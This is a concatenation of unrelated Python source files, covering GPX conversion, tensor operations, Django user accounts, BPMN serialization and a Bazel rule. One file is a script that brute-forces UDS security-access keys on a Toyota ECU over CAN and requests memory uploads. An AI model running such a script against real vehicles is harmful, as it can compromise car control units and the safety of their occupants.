f_out.write("<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\" creator=\"Google Latitude JSON Converter\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd\">\n")
f_out.write(" <metadata>\n")
f_out.write(" <name>Location History</name>\n")
f_out.write(" </metadata>\n")
if args.format == "gpx":
for item in items:
f_out.write(" <wpt lat=\"%s\" lon=\"%s\">\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
if "altitude" in item:
f_out.write(" <ele>%d</ele>\n" % item["altitude"])
f_out.write(" <time>%s</time>\n" % str(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ")))
f_out.write(" <desc>%s" % datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%d %H:%M:%S"))
if "accuracy" in item or "speed" in item:
f_out.write(" (")
if "accuracy" in item:
f_out.write("Accuracy: %d" % item["accuracy"])
if "accuracy" in item and "speed" in item:
f_out.write(", ")
if "speed" in item:
f_out.write("Speed:%d" % item["speed"])
f_out.write(")")
f_out.write("</desc>\n")
f_out.write(" </wpt>\n")
if args.format == "gpxtracks":
f_out.write(" <trk>\n")
f_out.write(" <trkseg>\n")
lastloc = None
# The deltas below assume input is in chronological or reverse chronological order.
# If it's not, use the '--chronological' option or uncomment this:
# items = sorted(data["data"]["items"], key=lambda x: x['timestampMs'], reverse=True)
for item in items:
if lastloc:
timedelta = abs((int(item['timestampMs']) - int(lastloc['timestampMs'])) / 1000 / 60)
distancedelta = getDistanceFromLatLonInKm(item['latitudeE7'] / 10000000, item['longitudeE7'] / 10000000, lastloc['latitudeE7'] / 10000000, lastloc['longitudeE7'] / 10000000)
if timedelta > 10 or distancedelta > 40:
# No points for 10 minutes or 40km in under 10m? Start a new track.
f_out.write(" </trkseg>\n")
f_out.write(" </trk>\n")
f_out.write(" <trk>\n")
f_out.write(" <trkseg>\n")
f_out.write(" <trkpt lat=\"%s\" lon=\"%s\">\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
if "altitude" in item:
f_out.write(" <ele>%d</ele>\n" % item["altitude"])
f_out.write(" <time>%s</time>\n" % str(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ")))
if "accuracy" in item or "speed" in item:
f_out.write(" <desc>\n")
if "accuracy" in item:
f_out.write(" Accuracy: %d\n" % item["accuracy"])
if "speed" in item:
f_out.write(" Speed:%d\n" % item["speed"])
f_out.write(" </desc>\n")
f_out.write(" </trkpt>\n")
lastloc = item
f_out.write(" </trkseg>\n")
f_out.write(" </trk>\n")
f_out.write("</gpx>\n")
f_out.close()
else:
print("No data found in json")
return
# Haversine formula
def getDistanceFromLatLonInKm(lat1,lon1,lat2,lon2):
R = 6371 # Radius of the earth in km
dlat = deg2rad(lat2-lat1)
dlon = deg2rad(lon2-lon1)
a = math.sin(dlat/2) * math.sin(dlat/2) + \
math.cos(deg2rad(lat1)) * math.cos(deg2rad(lat2)) * \
math.sin(dlon/2) * math.sin(dlon/2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = R * c # Distance in km
return d
def deg2rad(deg):
return deg * (math.pi/180)
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
3304212 | import numpy as np
import collections
import itertools as itt
import functools as fct
import warnings
class TensorCommon:
""" A base class for Tensor and AbelianTensor, that implements some
higher level functions that are common to the two. Useful also for
type checking as in isinstance(T, TensorCommon).
"""
@classmethod
def empty(cls, *args, **kwargs):
return cls.initialize_with(np.empty, *args, **kwargs)
@classmethod
def zeros(cls, *args, **kwargs):
return cls.initialize_with(np.zeros, *args, **kwargs)
@classmethod
def ones(cls, *args, **kwargs):
return cls.initialize_with(np.ones, *args, **kwargs)
@classmethod
def random(cls, *args, **kwargs):
return cls.initialize_with(np.random.random_sample, *args, **kwargs)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Miscellaneous
def form_str(self):
s = "shape: %s\nqhape: %s\ndirs: %s"%(
str(self.shape), str(self.qhape), str(self.dirs))
return s
@staticmethod
def flatten_shape(shape):
try:
return tuple(map(TensorCommon.flatten_dim, shape))
except TypeError:
return shape
@staticmethod
def flatten_dim(dim):
try:
return sum(dim)
except TypeError:
return dim
def norm_sq(self):
conj = self.conj()
all_inds = tuple(range(len(self.shape)))
norm_sq = self.dot(conj, (all_inds, all_inds))
return np.abs(norm_sq.value())
def norm(self):
return np.sqrt(self.norm_sq())
@classmethod
def default_trunc_err_func(cls, S, chi, norm_sq=None):
if norm_sq is None:
norm_sq = sum(S**2)
sum_disc = sum(S[chi:]**2)
err = np.sqrt(sum_disc/norm_sq)
return err
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The meat: actual tensor operations
def to_matrix(self, left_inds, right_inds, dirs=None,
return_transposed_shape_data=False):
""" Transposes left_inds to one side of self and right_inds to
the other, and joins these indices so that the result is a
matrix. On both sides, before reshaping, the indices are also
transposed to the order given in left/right_inds. If one or both
of left/right_inds is not provided the result is a vector or a
scalar.
dirs are the directions of the new indices. By default it is
[1,-1] for matrices and [1] (respectively [-1]) if only
left_inds (respectively right_inds) is provided.
If return_transposed_shape_data is True then the shape, qhape
and dirs of the tensor after all the transposing but before
reshaping is returned as well.
"""
if dirs is None:
if len(left_inds) > 0 and len(right_inds) > 0:
dirs = [1,-1]
elif len(right_inds) > 0:
dirs = [-1]
elif len(left_inds) > 0:
dirs = [1]
else:
dirs = []
result = self.join_indices(left_inds, right_inds, dirs=dirs,
return_transposed_shape_data=\
return_transposed_shape_data)
if return_transposed_shape_data:
result, transposed_shape, transposed_qhape, transposed_dirs =\
result
# join_indices does not return a matrix with left_inds as the
# first index and right_inds as the second, so we may have to
# transpose.
if left_inds and right_inds and left_inds[0] > right_inds[0]:
result = result.swapaxes(1,0)
if return_transposed_shape_data:
ts_left = transposed_shape[:len(right_inds)]
ts_right = transposed_shape[len(right_inds):]
transposed_shape = ts_right + ts_left
if transposed_qhape is not None:
qs_left = transposed_qhape[:len(right_inds)]
qs_right = transposed_qhape[len(right_inds):]
transposed_qhape = qs_right + qs_left
if transposed_dirs is not None:
qs_left = transposed_dirs[:len(right_inds)]
qs_right = transposed_dirs[len(right_inds):]
transposed_dirs = qs_right + qs_left
if return_transposed_shape_data:
return result, transposed_shape, transposed_qhape, transposed_dirs
else:
return result
def from_matrix(self, left_dims, right_dims,
left_qims=None, right_qims=None,
left_dirs=None, right_dirs=None):
""" The counter part of to_matrix, from_matrix takes in a matrix
and the dims, qims and dirs lists of the left and right indices
that the resulting tensor should have. Mainly meant to be used
so that one first calls to_matrix, takes note of the
transposed_shape_data and uses that to reshape the matrix back
to a tensor once one is done operating on the matrix.
"""
indices = tuple(range(len(self.shape)))
final_dims = ()
final_qims = ()
final_dirs = ()
if indices:
if left_dims:
final_dims += (left_dims,)
final_qims += (left_qims,)
final_dirs += (left_dirs,)
if right_dims:
final_dims += (right_dims,)
final_qims += (right_qims,)
final_dirs += (right_dirs,)
if left_qims is right_qims is None:
final_qims = None
if left_dirs is right_dirs is None:
final_dirs = None
return self.split_indices(indices, final_dims, qims=final_qims,
dirs=final_dirs)
def dot(self, other, indices):
""" Dot product of tensors. See numpy.tensordot on how to use
this, the interface is exactly the same, except that this one is
a method, not a function. The original tensors are not modified.
"""
# We want to deal with lists, not tuples or bare integers
a,b = indices
if isinstance(a, collections.Iterable):
a = list(a)
else:
a = [a]
if isinstance(b, collections.Iterable):
b = list(b)
else:
b = [b]
# Check that 1) the number of contracted indices for self and
# other match and 2) that the indices are compatible, i.e. okay
# to contract with each other. In addition raise a warning if
# the dirs don't match.
assert(len(a) == len(b))
assert(all(itt.starmap(
fct.partial(self.compatible_indices, other),
zip(a, b))))
if (self.dirs is not None and other.dirs is not None and
not all(self.dirs[i] + other.dirs[j] == 0
for i,j in zip(a,b))):
warnings.warn("dirs in dot do not match.")
s_sum = a
s_open = [i for i in range(len(self.shape)) if i not in a]
o_sum = b
o_open = [i for i in range(len(other.shape)) if i not in b]
self, s_transposed_shape, s_transposed_qhape, s_transposed_dirs =\
self.to_matrix(s_open, s_sum,
return_transposed_shape_data=True)
other, o_transposed_shape, o_transposed_qhape, o_transposed_dirs =\
other.to_matrix(o_sum, o_open,
return_transposed_shape_data=True)
self = self.matrix_dot(other)
del(other)
l_dims = s_transposed_shape[:len(s_open)]
r_dims = o_transposed_shape[len(o_sum):]
try:
l_qims = s_transposed_qhape[:len(s_open)]
r_qims = o_transposed_qhape[len(o_sum):]
except TypeError:
l_qims = None
r_qims = None
try:
l_dirs = s_transposed_dirs[:len(s_open)]
r_dirs = o_transposed_dirs[len(o_sum):]
except TypeError:
l_dirs = None
r_dirs = None
self = self.from_matrix(l_dims, r_dims,
left_qims=l_qims, right_qims=r_qims,
left_dirs=l_dirs, right_dirs=r_dirs)
return self
def eig(self, a, b, *args, return_rel_err=False, **kwargs):
""" Transpose indices a to be on one side of self, b on the
other, and reshape self to a matrix. Then find the eigenvalues
and eigenvectors of this matrix, and reshape the eigenvectors to
have on the left side the indices that self had on its right
side after transposing but before reshaping.
If hermitian is True then the matrix that is formed after the
reshape is assumed to be hermitian.
Truncation works like with SVD.
Output is S, U, [rel_err], where S is a vector of eigenvalues
and U is a tensor such that the last index enumerates the
eigenvectors of self in the sense that if u_i = U[...,i] then
self.dot(u_i, (b, all_indices_of_u_i)) == S[i] * u_i. rel_err is
relative error in truncation, only returned if return_rel_err is
True.
The above syntax is precisely correct only for Tensors. For
AbelianTensors the idea is the same, but eigenvalues and vectors
come with quantum numbers so the syntax is slightly different.
See AbelianTensor.matrix_eig for more details about what
precisely happens.
The original tensor is not modified by this method.
"""
if not isinstance(a, collections.Iterable):
a = (a,)
if not isinstance(b, collections.Iterable):
b = (b,)
self, transposed_shape, transposed_qhape, transposed_dirs\
= self.to_matrix(a, b, return_transposed_shape_data=True)
S, U, rel_err = self.matrix_eig(*args, **kwargs)
del(self)
U_dims = (transposed_shape[:len(a)], S.shape)
if transposed_qhape is not None:
U_qims = (transposed_qhape[:len(a)], S.qhape)
else:
U_qims = (None, None)
if transposed_dirs is not None:
U_dirs = (transposed_dirs[:len(a)], U.dirs[1:])
else:
U_dirs = (None, None)
U = U.from_matrix(*U_dims,
left_qims=U_qims[0], right_qims=U_qims[1],
left_dirs=U_dirs[0], right_dirs=U_dirs[1])
ret_val = (S, U)
if return_rel_err:
ret_val += (rel_err,)
return ret_val
def svd(self, a, b, *args, return_rel_err=False, **kwargs):
""" Transpose indices a to be on one side of self, b on the
other, and reshape self to a matrix. Then singular value
decompose this matrix into U, S, V. Finally reshape the unitary
matrices to tensors that have a new index coming from the SVD,
for U as the last index and for V as the first, and U to have
indices a as its first indices and V to have indices b as its
last indices.
If eps>0 then the SVD may be truncated if the relative Frobenius
norm error can be kept below eps. For this purpose different
dimensions to truncate to can be tried, and these dimensions
should be listed in chis. If chis is None then the full range of
possible dimensions is tried.
If print_errors > 0 then the truncation error is printed.
If return_rel_err is True then the relative truncation error is
also returned.
Output is U, S, V, and possibly rel_err. Here S is a vector of
singular values and U and V are isometric tensors (unitary if
the matrix that is SVDed is square and there is no truncation).
U . diag(S) . V = self, up to truncation errors.
The original tensor is not modified by this method.
"""
if not isinstance(a, collections.Iterable):
a = (a,)
if not isinstance(b, collections.Iterable):
b = (b,)
self, transposed_shape, transposed_qhape, transposed_dirs =\
self.to_matrix(a, b, return_transposed_shape_data=True)
U, S, V, rel_err = self.matrix_svd(*args, **kwargs)
del(self)
U_dims = (transposed_shape[:len(a)], S.shape)
V_dims = (S.shape, transposed_shape[len(a):])
if transposed_qhape is not None:
U_qims = (transposed_qhape[:len(a)], S.qhape)
V_qims = (S.qhape, transposed_qhape[len(a):])
else:
U_qims = (None, None)
V_qims = (None, None)
if transposed_dirs is not None:
U_dirs = (transposed_dirs[:len(a)], U.dirs[1:])
V_dirs = (V.dirs[:1], transposed_dirs[len(a):])
else:
U_dirs = (None, None)
V_dirs = (None, None)
U = U.from_matrix(*U_dims,
left_qims=U_qims[0], right_qims=U_qims[1],
left_dirs=U_dirs[0], right_dirs=U_dirs[1])
V = V.from_matrix(*V_dims,
left_qims=V_qims[0], right_qims=V_qims[1],
left_dirs=V_dirs[0], right_dirs=V_dirs[1])
ret_val = (U, S, V)
if return_rel_err:
ret_val += (rel_err,)
return ret_val
def matrix_decomp_format_chis(self, chis, eps):
""" A common function for formatting the truncation parameters
of SVD and eig. This is meant to be called by the matrix_svd and
matrix_eig functions of subclasses.
"""
if chis is None:
min_dim = min(type(self).flatten_dim(self.shape[i])
for i in range(len(self.shape))) + 1
if eps > 0:
chis = tuple(range(min_dim))
else:
chis = [min_dim]
else:
try:
chis = tuple(chis)
except TypeError:
chis = [chis]
if eps == 0:
chis = [max(chis)]
else:
chis = sorted(chis)
return chis
def split(self, a, b, *args, return_rel_err=False,
return_sings=False, weight="both", **kwargs):
""" Split with SVD. Like SVD, but takes the square root of the
singular values and multiplies both unitaries with it, so that
the tensor is split into two parts. Values are returned as
(US, {S}, SV, {rel_err}),
where the ones in curly brackets are only returned if the
corresponding arguments are True.
The distribution of sqrt(S) onto the two sides can be changed
with the keyword argument weight. If weight="left"
(correspondingly "right") then S is multiplied into U
(correspondingly V). By default weight="both".
"""
svd_result = self.svd(a, b, *args, return_rel_err=return_rel_err,
**kwargs)
U, S, V = svd_result[0:3]
weight = weight.strip().lower()
if weight in ("both", "split", "center", "centre", "c", "middle", "m"):
S_sqrt = S.sqrt()
U = U.multiply_diag(S_sqrt, -1, direction="right")
V = V.multiply_diag(S_sqrt, 0, direction="left")
elif weight in ("left", "l", "a", "u"):
U = U.multiply_diag(S, -1, direction="right")
elif weight in ("right", "r", "b", "v"):
V = V.multiply_diag(S, 0, direction="left")
else:
raise ValueError("Unknown value for weight: {}".format(weight))
if return_sings:
ret_val = U, S, V
else:
ret_val = U, V
if return_rel_err:
ret_val += (svd_result[3],)
return ret_val
| StarcoderdataPython |
1604409 | <gh_stars>1-10
# -*- coding: UTF-8 -*-
import io
import json
from tests.testing import resource_filename
from yelp.obj.business import Business
from yelp.obj.deal import Deal
from yelp.obj.location import Location
from yelp.obj.response_object import ResponseObject
class TestResponseObject(object):
@classmethod
def setup_class(cls):
with io.open(resource_filename('json/business_response.json')) as resp:
cls.response = json.load(resp)
def test_response_obj_sets_correct_fields(self):
with io.open(resource_filename('json/test_response.json')) as resp:
response = json.load(resp)
obj = ResponseObject('{}')
obj._fields = ['id', 'name']
obj.__init__(response)
assert obj.id == response['id']
assert obj.name == response['name']
assert hasattr(obj, 'do_not_display') is False
def test_response_obj_parse_list(self):
obj = ResponseObject('{}')
obj._parse('deals', Deal, self.response)
assert len(obj.deals) == len(self.response['deals'])
assert type(obj.deals[0]) is Deal
def test_response_obj_parse_one(self):
obj = ResponseObject('{}')
obj._parse('location', Location, self.response)
assert type(obj.location) is Location
def test_parse_main_response_body(self):
obj = ResponseObject('{}')
obj._parse_main_response_body('business', Business, self.response)
assert type(obj.business) is Business
| StarcoderdataPython |
179265 | import json
import matplotlib.pyplot as plt
from imantics import Dataset
if __name__ == '__main__':
with open('composition_dataset_2/train/annotations/annotations.json') as f:
data = json.load(f)
dataset = Dataset.from_coco(data)
for image in dataset.iter_images():
draw = image.draw(bbox=True)
plt.imshow(draw)
plt.show()
| StarcoderdataPython |
159061 | <gh_stars>0
from datetime import timedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models import Q
from django.db.models.signals import pre_save, post_save
from django.contrib.auth.models import (
AbstractBaseUser, BaseUserManager
)
from django.core.mail import send_mail
from django.template.loader import get_template
from django.utils import timezone
from ecommerce.utils import random_string_generator, unique_key_generator
# send_mail(subject, message, from_email, recipient_list, html_message)
DEFAULT_ACTIVATION_DAYS = getattr(settings, 'DEFAULT_ACTIVATION_DAYS', 7)
# Create your models here.
class UserManager(BaseUserManager):
def create_user(self, email, full_name=None, password=<PASSWORD>, is_active=True, is_staff=False, is_admin=False):
if not email:
raise ValueError("Users must have an email address")
if not password:
raise ValueError("Users must have a password address")
# if not full_name:
# raise ValueError("Users must have a fullname")
user_obj = self.model(
email = self.normalize_email(email),
full_name = full_name,
)
user_obj.set_password(password) # change user password as well
user_obj.staff = is_staff
user_obj.admin = is_admin
user_obj.is_active = is_active
user_obj.save(using=self._db)
return user_obj
def create_staffuser(self, email, full_name=None, password=<PASSWORD>):
user = self.create_user(
email,
full_name=full_name,
password=password,
is_staff=True,
)
return user
def create_superuser(self, email, full_name=None, password=<PASSWORD>):
user = self.create_user(
email,
full_name=full_name,
password=password,
is_staff=True,
is_admin=True,
)
return user
class User(AbstractBaseUser):
# username = models.CharField()
email = models.EmailField(max_length=255, unique=True)
full_name = models.CharField(max_length=255, blank=True, null=True)
is_active = models.BooleanField(default=True)
staff = models.BooleanField(default=False)
admin = models.BooleanField(default=False)
timestamp = models.DateTimeField(auto_now_add=True)
# confirm = models.BooleanField(default=False)
# confirmed_date = models.DateTimeField()
USERNAME_FIELD = 'email' # could be username if we wanted to
REQUIRED_FIELDS = [] # ['full_name'] # USERNAME_FIELD and password are required by default
objects = UserManager()
def __str__(self):
return self.email
def get_full_name(self):
if self.full_name:
return self.full_name
return self.email
def get_short_name(self):
return self.email
def has_perm(self, perm, obj=None):
return True
def has_module_perms(self, app_lable):
return True
@property
def is_staff(self):
if self.is_admin:
return True
return self.staff
@property
def is_admin(self):
return self.admin
class EmailActivationQuerySet(models.query.QuerySet): # EmailActiation.objects.all().confirmable()
def confirmable(self):
# DEFAULT_ACTIVATION_DAYS
now = timezone.now()
start_range = now - timedelta(days=DEFAULT_ACTIVATION_DAYS)
# does my object have a timestamp here
end_range = now
return self.filter(
activated = False,
forced_expired = False
).filter(
timestamp__gt = start_range,
timestamp__lte = end_range
)
class EmailActivationManager(models.Manager):
def get_queryset(self):
return EmailActivationQuerySet(self.model, using=self._db)
def confirmable(self):
return self.get_queryset().confirmable()
def email_exists(self, email):
return self.get_queryset().filter(Q(email=email) | Q(user__email=email)).filter(activated=False)
class EmailActivation(models.Model):
user = models.ForeignKey(User)
email = models.EmailField()
key = models.CharField(max_length=120, blank=True, null=True)
activated = models.BooleanField(default=False)
forced_expired = models.BooleanField(default=False)
expires = models.IntegerField(default=7) # 7 Days
timestamp = models.DateTimeField(auto_now_add=True)
update = models.DateTimeField(auto_now=True)
objects = EmailActivationManager()
def __str__(self):
return self.email
def can_activate(self):
qs = EmailActivation.objects.filter(pk=self.pk).confirmable()
if qs.exists():
return True
return False
def activate(self):
if self.can_activate():
# pre activation user signal
user = self.user
user.is_active = True
user.save()
# post signal for user just activated
self.activated = True
self.save()
return True
return False
def regenerate(self):
self.key = None
self.save()
if self.key is not None:
return True
return False
def send_activation(self):
if not self.activated and not self.forced_expired:
if self.key:
base = getattr(settings, 'BASE_URL', 'https://127.0.0.1:8000')
key_path = reverse('account:email-activate', kwargs={'key': self.key})
path = '{base}{path}'.format(base=base, path=key_path)
context = {
'path': path,
'email': self.email,
}
key = random_string_generator(size=45)
txt_ = get_template('registration/emails/verify.txt').render(context)
html_ = get_template('registration/emails/verify.html').render(context)
subject = '1-Click Email Verification'
from_email = settings.DEFAULT_FROM_EMAIL
recipient_list = [self.email]
sent_mail = None
print("account.models: sending email...")
try:
sent_mail = send_mail(
subject,
txt_,
from_email,
recipient_list,
html_message=html_,
fail_silently=False
)
except Exception as e:
print("account.models: exception!")
print(e)
print("account.models: email sent")
return sent_mail
return False
def pre_save_email_activation(sender, instance, *args, **kwargs):
if not instance.activated and not instance.forced_expired:
if not instance.key:
instance.key = unique_key_generator(instance)
pre_save.connect(pre_save_email_activation, sender=EmailActivation)
def post_save_user_create_receiver(sender, instance, created, *args, **kwargs):
if created:
obj = EmailActivation.objects.create(user=instance, email=instance.email)
obj.send_activation()
post_save.connect(post_save_user_create_receiver, sender=User)
class Profile(models.Model):
user = models.OneToOneField(User)
# extra fields
class GuestEmail(models.Model):
email = models.EmailField()
active = models.BooleanField(default=True)
update = models.DateTimeField(auto_now=True)
timestamp = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.email
| StarcoderdataPython |
35596 | from .NumpyDataset import NumpyDataset | StarcoderdataPython |
3287121 | <filename>src/simod/writers/model_serialization.py
import xml.etree.ElementTree as ET
import xmltodict as xtd
from simod.configuration import QBP_NAMESPACE_URI
from ..readers import bpmn_reader as br
def serialize_model(filename):
bpmn = br.BpmnReader(filename)
tasks = {x['task_id']: x['task_name'] for x in bpmn.get_tasks_info()}
seqs = bpmn.get_edges_info()
ns = {'qbp': QBP_NAMESPACE_URI}
tree = ET.parse(filename)
root = tree.getroot()
sim_model_xml = ET.tostring(root.find("qbp:processSimulationInfo",
namespaces=ns))
sim_model_xml = sim_model_xml.decode()
sim_model_xml = sim_model_xml.replace(ns['qbp'], 'qbp')
sim_model_xml = bytes(sim_model_xml, 'utf-8')
sim_model_xml = xtd.parse(sim_model_xml)
info = "qbp:processSimulationInfo"
sim_model_xml[info]['arrival_rate'] = (
sim_model_xml[info].pop('qbp:arrivalRateDistribution'))
sim_model_xml[info]['arrival_rate']['dname'] = (
sim_model_xml[info]['arrival_rate'].pop('@type'))
sim_model_xml[info]['arrival_rate']['dparams'] = dict()
sim_model_xml[info]['arrival_rate']['dparams']['arg1'] = (
sim_model_xml[info]['arrival_rate'].pop('@arg1'))
sim_model_xml[info]['arrival_rate']['dparams']['arg2'] = (
sim_model_xml[info]['arrival_rate'].pop('@arg2'))
sim_model_xml[info]['arrival_rate']['dparams']['mean'] = (
sim_model_xml[info]['arrival_rate'].pop('@mean'))
sim_model_xml[info]['arrival_rate'].pop('qbp:timeUnit')
tags = {'element': 'elements_data',
'resource': 'resource_pool',
'sequenceFlow': 'sequences',
'timetable': 'time_table'}
for k, v in tags.items():
element = sim_model_xml[info]['qbp:' + k + 's']["qbp:" + k]
sim_model_xml[info].pop('qbp:' + k + 's')
sim_model_xml[info][v] = element
sim_model_xml[info]['instances'] = (
sim_model_xml[info].pop('@processInstances'))
sim_model_xml[info]['start_time'] = (
sim_model_xml[info].pop('@startDateTime'))
sim_model_xml[info].pop('@currency')
sim_model_xml[info].pop('@id')
sim_model_xml[info].pop('@xmlns:qbp')
element = sim_model_xml[info]
sim_model_xml.pop(info)
sim_model_xml = element
for element in sim_model_xml['elements_data']:
element['elementid'] = element.pop('@elementId')
element['id'] = element.pop('@id')
element['arg1'] = element['qbp:durationDistribution']['@arg1']
element['arg2'] = element['qbp:durationDistribution']['@arg2']
element['mean'] = element['qbp:durationDistribution']['@mean']
element['type'] = element['qbp:durationDistribution']['@type']
element['resource'] = element['qbp:resourceIds']['qbp:resourceId']
element['name'] = tasks[element['elementid']]
element.pop('qbp:durationDistribution')
element.pop('qbp:resourceIds')
for element in sim_model_xml['sequences']:
element['elementid'] = element.pop('@elementId')
element['prob'] = element.pop('@executionProbability')
seq = list(filter(lambda x: x['sf_id'] == element['elementid'], seqs))[0]
element['gatewayid'] = seq['source']
element['out_path_id'] = seq['target']
return sim_model_xml
| StarcoderdataPython |
93843 | <reponame>andrewraharjo/CAN-Bus-Hack_Prius_Focus
from PyEcom import *
from config import *
import time, struct, sys, binascii
def str_to_hexarr(val):
payload = []
for x in val:
payload.append(ord(x))
return payload
def nbo_int_to_bytearr(dword):
arr = []
arr.append(dword & 0xFF)
arr.append((dword >> 8) & 0xFF)
arr.append((dword >> 16) & 0xFF)
arr.append((dword >> 24) & 0xFF)
return arr
class EcuPart:
def __init__(self, address, write_address, length):
self.address = address
self.write_address = write_address
self.length = length
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1,35916)
ECU = 0x750
#SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB
for i in range(0, 1000):
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40)
#key = (ret[2] - 0xAB) & 0xFF
#key = (~ret[2] + 1) & 0xFF
key = i & 0xFF
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40)
if ret[2] != 0x35:
print "New Error: %d %d" % (key, i)
break
ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001, 0x40)
#Potential values for 34715300
#val = ecom.toyota_dword_to_targetdata(0xD2363456),
#val = ecom.toyota_dword_to_targetdata(0x0E5E5B29)
#val = ecom.toyota_dword_to_targetdata(0x6F8C9954)
#val = ecom.toyota_dword_to_targetdata(0x423659A8)
#val = ecom.toyota_targetdata_to_dword("42353B3C3A4A4948")
#print "34715100 %08X" % (val)
#T-0008-08.cuw
## val = ecom.toyota_targetdata_to_dword("443637373B3B384A")
## print "34702000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443345463B3C484B")
## print "34702100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443A45453B3D4839")
## print "34702200 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443A33493B3D4B4D")
## print "34705000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443246363B463B49")
## print "34705100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("444632463B473D4B")
## print "34705200 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("4231333A3A384B3E")
## print "34705300 %08X" % (val)
##
## #T-009-08.cuw
## val = ecom.toyota_targetdata_to_dword("4437483B3B483F3D")
## print "34709000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("424539363A363749")
## print "34710000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("423145393A38484C")
## print "34710100 %08X" % (val)
##
## #T-0052-11.cuw
## val = ecom.toyota_targetdata_to_dword("423438493A3E3E4D")
## print "34715000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("42353B3C3A4A4948")
## print "34715100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D")
## print "34715200 %08X" % (val)
## print "CRC32: %08X" % (binascii.crc32("34715200") & 0xFFFFFFFF)
##
## #T-0053-11.cuw
## val = ecom.toyota_targetdata_to_dword("3042384539373E39")
## print "34728000 %08X" % (val)
##
## #T-0146-10
## val = ecom.toyota_targetdata_to_dword("3638393449353A37")
## print "F152647127 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647127") & 0xFFFFFFFF)
##
## val = ecom.toyota_targetdata_to_dword("3638463749353839")
## print "F152647126 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647126") & 0xFFFFFFFF)
##
## val = ecom.toyota_targetdata_to_dword("363846394935383C")
## print "F152647125 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647125") & 0xFFFFFFFF)
##
## f = open("toyota_ecu.bin", "rb")
##
## num = 1
## total_blocks = []
##
## chunk = f.read(0x400)
## if chunk:
## hex_arr = str_to_hexarr(chunk)
## total_blocks += hex_arr
##
## #datalen = len(hex_arr)
## datalen = 0x400
##
##
## print "%04X" % (datalen)
##
## datalen = datalen & 0x0FFF
## data_bytes = (0x01000 | datalen) & 0x0FFFF
## byteone = (data_bytes >> 8)
## bytetwo = data_bytes & 0xFF
##
## print "%02X %02X" % (byteone, bytetwo)
##
## #print "[%d] -> Len: %d" % (num, len(hex_arr))
## #print hex_arr
## num += 1
##
## print "Total: %X" % (len(total_blocks))
##
## vindex = 0
## cnt = 0
## chunks = len(total_blocks) / 0x100
##
##
## for i in range(0, chunks):
## print "Count: %d" % (cnt)
##
## tmp = total_blocks[vindex:vindex+0x100]
## vindex += 0x100
## cnt += 1
## for asdf in tmp:
## sys.stdout.write("%02X " % (asdf))
##
## ecu1 = EcuPart(0x00000000, 0xFF000000, 0x1000)
## ecu2 = EcuPart(0xF7000100, 0xFF001000, None)
##
##
## addrs = [0x00000000, 0xF7000100]
## write_addrs = [0xFF000000, 0xFF001000]
##
## lens = {}
## lens[addrs[0]] = 0x1000
##
## addr_arr = nbo_int_to_bytearr(write_addrs[0])
## print hex(addr_arr[0])
## print hex(addr_arr[1])
## print hex(addr_arr[2])
## print hex(addr_arr[3])
##
## f.close()
| StarcoderdataPython |
3357096 | # Copyright 2016 The Bazel Go Rules Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_script_content = """
BASE=$(pwd)
WORKSPACE=$(dirname $(readlink WORKSPACE))
cd "$WORKSPACE"
$BASE/{gazelle} {args} $@
"""
def _gazelle_script_impl(ctx):
prefix = ctx.attr.prefix if ctx.attr.prefix else ctx.attr._go_prefix.go_prefix
args = [ctx.attr.command] + ctx.attr.args
args += [
"-repo_root", "$WORKSPACE",
"-go_prefix", prefix,
"-external", ctx.attr.external,
"-mode", ctx.attr.mode,
]
if ctx.attr.build_tags:
args += ["-build_tags", ",".join(ctx.attr.build_tags)]
